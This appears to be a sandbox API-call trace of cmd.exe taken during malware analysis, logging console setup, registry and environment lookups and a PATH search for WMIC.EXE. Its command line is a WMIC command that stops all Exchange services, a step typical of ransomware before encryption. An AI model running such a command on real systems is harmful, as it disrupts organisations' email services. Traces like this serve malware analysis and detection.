"sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 152 os_tid = 0xcac [0105.459] GetModuleHandleA (lpModuleName=0x0) returned 0x3c0000 [0105.459] __set_app_type (_Type=0x1) [0105.459] __p__fmode () returned 0x77ac4d6c [0105.460] __p__commode () returned 0x77ac5b1c [0105.460] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3d36e0) returned 0x0 [0105.460] __getmainargs (in: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0, _DoWildCard=0, _StartInfo=0x3e50fc | out: _Argc=0x3e50e8, _Argv=0x3e50ec, _Env=0x3e50f0) returned 0 [0105.460] GetCurrentThreadId () returned 0xcac [0105.460] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xcac) returned 0x84 [0105.460] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0105.460] GetProcAddress (hModule=0x77670000, lpProcName="SetThreadUILanguage") returned 0x776b2780 [0105.460] SetThreadUILanguage (LangId=0x0) returned 0x409 [0105.463] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0105.463] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x509fadc | out: phkResult=0x509fadc*=0x0) returned 0x2 [0105.464] VirtualQuery (in: lpAddress=0x509fae3, lpBuffer=0x509fa94, dwLength=0x1c | out: lpBuffer=0x509fa94*(BaseAddress=0x509f000, AllocationBase=0x4fa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0105.464] VirtualQuery (in: lpAddress=0x4fa0000, lpBuffer=0x509fa94, dwLength=0x1c | out: lpBuffer=0x509fa94*(BaseAddress=0x4fa0000, AllocationBase=0x4fa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0105.464] VirtualQuery (in: lpAddress=0x4fa1000, lpBuffer=0x509fa94, dwLength=0x1c | out: lpBuffer=0x509fa94*(BaseAddress=0x4fa1000, AllocationBase=0x4fa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0105.464] VirtualQuery (in: lpAddress=0x4fa3000, lpBuffer=0x509fa94, dwLength=0x1c | out: lpBuffer=0x509fa94*(BaseAddress=0x4fa3000, AllocationBase=0x4fa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0105.464] VirtualQuery (in: lpAddress=0x50a0000, lpBuffer=0x509fa94, dwLength=0x1c | out: lpBuffer=0x509fa94*(BaseAddress=0x50a0000, AllocationBase=0x50a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0105.464] GetConsoleOutputCP () returned 0x1b5 [0105.464] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0105.464] SetConsoleCtrlHandler (HandlerRoutine=0x3df980, Add=1) returned 1 [0105.464] _get_osfhandle (_FileHandle=1) returned 0x3c [0105.464] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0105.465] _get_osfhandle (_FileHandle=1) returned 0x3c [0105.465] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x3ee40c | out: lpMode=0x3ee40c) returned 1 [0105.465] _get_osfhandle (_FileHandle=1) returned 0x3c [0105.465] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0105.465] _get_osfhandle (_FileHandle=0) returned 0x38 [0105.465] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x3ee408 | out: lpMode=0x3ee408) returned 1 [0105.465] _get_osfhandle (_FileHandle=0) returned 0x38 [0105.465] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0105.466] GetEnvironmentStringsW () returned 0x52e7de0* [0105.466] FreeEnvironmentStringsA (penv="A") returned 1 [0105.466] GetEnvironmentStringsW () returned 0x52e7de0* [0105.466] FreeEnvironmentStringsA (penv="A") returned 1 [0105.466] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x509ea40 | out: phkResult=0x509ea40*=0x94) returned 0x0 [0105.466] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x509ea44, lpData=0x509ea4c, lpcbData=0x509ea48*=0x1000 | out: lpType=0x509ea44*=0x0, lpData=0x509ea4c*=0x88, lpcbData=0x509ea48*=0x1000) returned 0x2 [0105.466] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x509ea44, lpData=0x509ea4c, lpcbData=0x509ea48*=0x1000 | out: lpType=0x509ea44*=0x4, lpData=0x509ea4c*=0x1, lpcbData=0x509ea48*=0x4) returned 0x0 [0105.466] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x509ea44, lpData=0x509ea4c, lpcbData=0x509ea48*=0x1000 | out: lpType=0x509ea44*=0x0, lpData=0x509ea4c*=0x1, lpcbData=0x509ea48*=0x1000) returned 0x2 [0105.466] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x509ea44, lpData=0x509ea4c, lpcbData=0x509ea48*=0x1000 | out: lpType=0x509ea44*=0x4, lpData=0x509ea4c*=0x0, lpcbData=0x509ea48*=0x4) returned 0x0 [0105.466] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x509ea44, lpData=0x509ea4c, lpcbData=0x509ea48*=0x1000 | out: lpType=0x509ea44*=0x4, lpData=0x509ea4c*=0x40, lpcbData=0x509ea48*=0x4) returned 0x0 [0105.466] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x509ea44, lpData=0x509ea4c, lpcbData=0x509ea48*=0x1000 | out: lpType=0x509ea44*=0x4, lpData=0x509ea4c*=0x40, lpcbData=0x509ea48*=0x4) returned 0x0 [0105.466] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x509ea44, lpData=0x509ea4c, lpcbData=0x509ea48*=0x1000 | out: lpType=0x509ea44*=0x0, lpData=0x509ea4c*=0x40, lpcbData=0x509ea48*=0x1000) returned 0x2 [0105.466] RegCloseKey (hKey=0x94) returned 0x0 [0105.467] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x509ea40 | out: phkResult=0x509ea40*=0x94) returned 0x0 [0105.467] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x509ea44, lpData=0x509ea4c, lpcbData=0x509ea48*=0x1000 | out: lpType=0x509ea44*=0x0, lpData=0x509ea4c*=0x40, lpcbData=0x509ea48*=0x1000) returned 0x2 [0105.467] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x509ea44, lpData=0x509ea4c, lpcbData=0x509ea48*=0x1000 | out: lpType=0x509ea44*=0x4, lpData=0x509ea4c*=0x1, lpcbData=0x509ea48*=0x4) returned 0x0 [0105.467] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x509ea44, lpData=0x509ea4c, lpcbData=0x509ea48*=0x1000 | out: lpType=0x509ea44*=0x0, lpData=0x509ea4c*=0x1, lpcbData=0x509ea48*=0x1000) returned 0x2 [0105.467] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x509ea44, lpData=0x509ea4c, lpcbData=0x509ea48*=0x1000 | out: lpType=0x509ea44*=0x4, lpData=0x509ea4c*=0x0, lpcbData=0x509ea48*=0x4) returned 0x0 [0105.467] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x509ea44, lpData=0x509ea4c, lpcbData=0x509ea48*=0x1000 | out: lpType=0x509ea44*=0x4, lpData=0x509ea4c*=0x9, lpcbData=0x509ea48*=0x4) returned 0x0 [0105.467] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x509ea44, lpData=0x509ea4c, lpcbData=0x509ea48*=0x1000 | out: lpType=0x509ea44*=0x4, lpData=0x509ea4c*=0x9, lpcbData=0x509ea48*=0x4) returned 0x0 [0105.467] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x509ea44, lpData=0x509ea4c, lpcbData=0x509ea48*=0x1000 | out: lpType=0x509ea44*=0x0, lpData=0x509ea4c*=0x9, lpcbData=0x509ea48*=0x1000) returned 0x2 [0105.467] RegCloseKey (hKey=0x94) returned 0x0 [0105.467] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad2981a [0105.467] srand (_Seed=0x5ad2981a) [0105.467] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%Exchange%'' CALL STOPSERVICE" [0105.467] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%Exchange%'' CALL STOPSERVICE" [0105.467] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0105.467] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x52e9d38, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0105.467] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0105.467] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0105.467] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0105.467] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0105.467] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0105.468] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0105.468] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0105.468] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0105.468] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0105.468] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0105.468] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0105.468] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0105.468] GetEnvironmentStringsW () returned 0x52e7de0* [0105.468] FreeEnvironmentStringsA (penv="A") returned 1 [0105.468] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0105.468] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0105.468] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0105.468] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0105.468] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0105.468] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0105.468] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0105.468] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0105.468] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0105.468] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0105.468] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x509f818 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0105.469] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x509f818, lpFilePart=0x509f810 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x509f810*="Desktop") returned 0x1d [0105.469] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0105.469] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x509f598 | out: lpFindFileData=0x509f598) returned 0x52e05c8 [0105.469] FindClose (in: hFindFile=0x52e05c8 | out: hFindFile=0x52e05c8) returned 1 [0105.469] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x509f598 | out: lpFindFileData=0x509f598) returned 0x52e05c8 [0105.469] FindClose (in: hFindFile=0x52e05c8 | out: hFindFile=0x52e05c8) returned 1 [0105.469] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0105.469] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x509f598 | out: lpFindFileData=0x509f598) returned 0x52e05c8 [0105.469] FindClose (in: hFindFile=0x52e05c8 | out: hFindFile=0x52e05c8) returned 1 [0105.469] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0105.469] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0105.470] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0105.470] GetEnvironmentStringsW () returned 0x52e7de0* [0105.470] FreeEnvironmentStringsA (penv="=") returned 1 [0105.470] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0105.470] GetConsoleOutputCP () returned 0x1b5 [0105.470] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0105.470] GetUserDefaultLCID () returned 0x409 [0105.471] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0105.471] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x509f948, cchData=128 | out: lpLCData="0") returned 2 [0105.471] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x509f948, cchData=128 | out: lpLCData="0") returned 2 [0105.471] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x509f948, cchData=128 | out: lpLCData="1") returned 2 [0105.471] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0105.471] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0105.471] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0105.471] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0105.471] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0105.471] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0105.471] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0105.471] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0105.471] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0105.471] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0105.471] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0105.472] GetConsoleTitleW (in: lpConsoleTitle=0x52eaab0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0105.472] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0105.472] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0105.472] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0105.473] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0105.473] GetEnvironmentVariableW (in: lpName="Exchange", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0105.473] _wcsicmp (_String1="Exchange", _String2="CD") returned 2 [0105.473] _wcsicmp (_String1="Exchange", _String2="ERRORLEVEL") returned 6 [0105.473] _wcsicmp (_String1="Exchange", _String2="CMDEXTVERSION") returned 2 [0105.473] _wcsicmp (_String1="Exchange", _String2="CMDCMDLINE") returned 2 [0105.473] _wcsicmp (_String1="Exchange", _String2="DATE") returned 1 [0105.473] _wcsicmp (_String1="Exchange", _String2="TIME") returned -15 [0105.473] _wcsicmp (_String1="Exchange", _String2="RANDOM") returned -13 [0105.473] _wcsicmp (_String1="Exchange", _String2="HIGHESTNUMANODENUMBER") returned -3 [0105.473] _wcsicmp (_String1="WMIC", _String2=")") returned 78 [0105.473] _wcsicmp (_String1="FOR", _String2="WMIC") returned -17 [0105.473] _wcsicmp (_String1="FOR/?", _String2="WMIC") returned -17 [0105.473] _wcsicmp (_String1="IF", _String2="WMIC") returned -14 [0105.473] _wcsicmp (_String1="IF/?", _String2="WMIC") returned -14 [0105.473] _wcsicmp (_String1="REM", _String2="WMIC") returned -5 [0105.473] _wcsicmp (_String1="REM/?", _String2="WMIC") returned -5 [0105.475] GetConsoleTitleW (in: lpConsoleTitle=0x509f630, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0105.475] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0105.475] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0105.475] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0105.475] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0105.475] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0105.475] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0105.475] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0105.475] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0105.475] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0105.475] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0105.475] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0105.475] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0105.475] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0105.475] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0105.475] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0105.475] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0105.475] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0105.475] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0105.475] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0105.475] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0105.475] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0105.475] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0105.475] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0105.475] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0105.475] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0105.475] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0105.475] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0105.475] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0105.475] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0105.475] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0105.475] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0105.475] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0105.476] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0105.476] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0105.476] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0105.476] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0105.476] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0105.476] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0105.476] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0105.476] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0105.476] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0105.476] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0105.476] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0105.476] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0105.476] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0105.476] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0105.476] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0105.476] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0105.476] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0105.476] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0105.476] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0105.476] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0105.476] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0105.476] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0105.476] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0105.476] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0105.476] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0105.476] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0105.476] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0105.476] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0105.476] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0105.476] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0105.476] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0105.476] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0105.476] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0105.476] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0105.476] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0105.476] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0105.476] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0105.476] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0105.476] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0105.476] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0105.476] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0105.476] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0105.476] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0105.476] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0105.476] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0105.476] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0105.476] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0105.476] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0105.476] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0105.476] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0105.476] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0105.476] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0105.476] _wcsicmp (_String1="WMIC", _String2="FOR") returned 17 [0105.476] _wcsicmp (_String1="WMIC", _String2="IF") returned 14 [0105.476] _wcsicmp (_String1="WMIC", _String2="REM") returned 5 [0105.477] _wcsnicmp (_String1="WMIC", _String2="cmd ", _MaxCount=0x4) returned 20 [0105.477] SetErrorMode (uMode=0x0) returned 0x0 [0105.477] SetErrorMode (uMode=0x1) returned 0x0 [0105.477] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x52e05d0, lpFilePart=0x509f13c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x509f13c*="Desktop") returned 0x1d [0105.477] SetErrorMode (uMode=0x0) returned 0x1 [0105.477] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0105.477] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0105.482] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0105.483] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0105.483] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x509eec8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x509eec8) returned 0xffffffff [0105.483] GetLastError () returned 0x2 [0105.483] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0105.483] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x509eec8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x509eec8) returned 0xffffffff [0105.484] GetLastError () returned 0x2 [0105.484] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0105.484] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x509eec8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x509eec8) returned 0xffffffff [0105.484] GetLastError () returned 0x2 [0105.484] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0105.484] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x509eec8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x509eec8) returned 0xffffffff [0105.484] GetLastError () returned 0x2 [0105.484] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0105.484] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x509eec8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x509eec8) returned 0x52eb240 [0105.484] FindClose (in: hFindFile=0x52eb240 | out: hFindFile=0x52eb240) returned 1 [0105.484] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x509eec8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x509eec8) returned 0xffffffff [0105.485] GetLastError () returned 0x2 [0105.485] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x509eec8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x509eec8) returned 0x52eb240 [0105.485] FindClose (in: hFindFile=0x52eb240 | out: hFindFile=0x52eb240) returned 1 [0105.485] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0105.485] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0105.485] GetConsoleTitleW (in: lpConsoleTitle=0x509f3bc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b 